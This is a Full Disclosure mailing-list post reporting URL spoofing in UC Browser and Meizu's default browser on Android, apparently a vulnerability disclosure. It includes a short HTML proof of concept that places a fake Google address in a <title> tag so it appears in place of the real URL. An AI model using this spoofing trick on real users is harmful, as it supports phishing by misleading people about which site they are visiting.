[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] URL spoofing in UC browser.



Hey list. It's possible to spoof an URL in mobile versions (Android)
of the UC browser [1][2] via <title> HTML tags. The newest version
from gplay (11.2.5.932) and the Meizu [3][4] branded default browser
(6.1.301) are affected. And the shocking poc would be:

--
<html>
<head>
    <title>
        https://you_are_safe_here.google.com/
    </title>
    щ(゚Д゚щ
</head>
</html>
--

which results in http://s1m0n.dft-labs.eu/files/meizu/ .

References:
[1] https://en.wikipedia.org/wiki/UC_Browser
[2] http://www.ucweb.com/company/about/
[3] http://www.meizu.com/en/
[4] http://www.themobileindian.com/news/meizu-partners-with-uc-browser-12605

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/